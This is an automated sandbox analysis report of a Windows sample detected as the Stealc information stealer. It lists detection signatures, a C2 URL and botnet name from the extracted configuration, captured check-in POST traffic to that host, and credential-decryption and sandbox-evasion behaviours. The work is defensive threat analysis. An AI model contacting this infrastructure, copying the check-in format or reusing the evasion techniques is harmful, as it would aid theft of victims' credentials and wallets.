Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532902
MD5:b77c7d40ff8020c4240697847b4f5684
SHA1:0a224a33c17ee87b76f1f83b76c36c5de12909e7
SHA256:f7b35010365b337b72e82d179783fe5165f92ffbdbf74071e44877a06c40c8a6
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B77C7D40FF8020C4240697847B4F5684)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7744JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7744JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ae0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T06:03:11.394808+020020442431Malware Command and Control Activity Detected192.168.2.849705185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.ae0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00AEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00AE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00AE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00AE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00AF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00AF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00AEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00AEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00AEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00AF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00AF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00AEBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 30 34 32 33 36 43 44 34 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"4D04236CD4534228319403------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00AE6280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 30 34 32 33 36 43 44 34 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"4D04236CD4534228319403------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
                Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1482335247.00000000017F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph~
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt~
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37a

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E80_2_00EAF0E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB784C0_2_00EB784C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F1240_2_00E4F124
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA690A0_2_00EA690A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB09140_2_00EB0914
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EABAAF0_2_00EABAAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCF2990_2_00FCF299
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8222B0_2_00E8222B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB23E60_2_00EB23E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8DBDA0_2_00F8DBDA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9C49A0_2_00D9C49A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA84040_2_00EA8404
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB8D4F0_2_00EB8D4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E70D200_2_00E70D20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E176E30_2_00E176E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8C6B10_2_00E8C6B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7EE630_2_00E7EE63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7363D0_2_00D7363D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB57A60_2_00EB57A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9F650_2_00EA9F65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB477B0_2_00EB477B
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: cxzomhko ZLIB complexity 0.994909029334828
                Source: file.exe, 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00AF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00AF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Q6MPI90K.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1869312 > 1048576
                Source: file.exeStatic PE information: Raw size of cxzomhko is bigger than: 0x100000 < 0x1a2200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ae0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cxzomhko:EW;idqsnktn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cxzomhko:EW;idqsnktn:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca59c should be: 0x1d19b6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: cxzomhko
                Source: file.exeStatic PE information: section name: idqsnktn
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], ebp0_2_00EAF107
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], ebx0_2_00EAF163
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], 5FAB3AFAh0_2_00EAF2C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 1713C6D9h; mov dword ptr [esp], edi0_2_00EAF2FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 013BEFD4h; mov dword ptr [esp], ebp0_2_00EAF30B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 44C4A3C2h; mov dword ptr [esp], edx0_2_00EAF465
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 7B3BE397h0_2_00EAF4C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ebx; mov dword ptr [esp], ebp0_2_00EAF565
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 7CE1567Ah; mov dword ptr [esp], ecx0_2_00EAF5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 27246F0Eh; mov dword ptr [esp], eax0_2_00EAF600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 60717040h; mov dword ptr [esp], edx0_2_00EAF61A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 59BCB273h; mov dword ptr [esp], edx0_2_00EAF657
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ebx; mov dword ptr [esp], 77BFDD1Dh0_2_00EAF721
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], edx0_2_00EAF744
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 04BC6DBDh; mov dword ptr [esp], esp0_2_00EAF74C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 0A0A505Ah; mov dword ptr [esp], ebx0_2_00EAF783
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 00000004h0_2_00EAF787
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edi; mov dword ptr [esp], edx0_2_00EAF7B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], eax0_2_00EAF7DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], edi0_2_00EAF7FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 271B1A8Ah; mov dword ptr [esp], edi0_2_00EAF83F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 548123C0h; mov dword ptr [esp], ebp0_2_00EAF85C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], edx0_2_00EAF868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], ebx0_2_00EAF997
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 2A731FBDh; mov dword ptr [esp], ebx0_2_00EAF9CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edi; mov dword ptr [esp], 1ED659A4h0_2_00EAFAE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], 6B8103B8h0_2_00EAFB81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 193AD415h; mov dword ptr [esp], ebx0_2_00EAFB93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], ebx0_2_00EAFBD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push 286C74EFh; mov dword ptr [esp], ebx0_2_00EAFBFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 1BD12312h0_2_00EAFC19
                Source: file.exeStatic PE information: section name: cxzomhko entropy: 7.953850272412943

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13646
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42125 second address: D42129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBDA7E second address: EBDA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBDA85 second address: EBDA91 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F417883CDCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE02B second address: EBE073 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4178B56578h 0x00000008 pop esi 0x00000009 jnl 00007F4178B56572h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007F4178B56571h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE073 second address: EBE079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE1F3 second address: EBE1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC029C second address: EC02A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
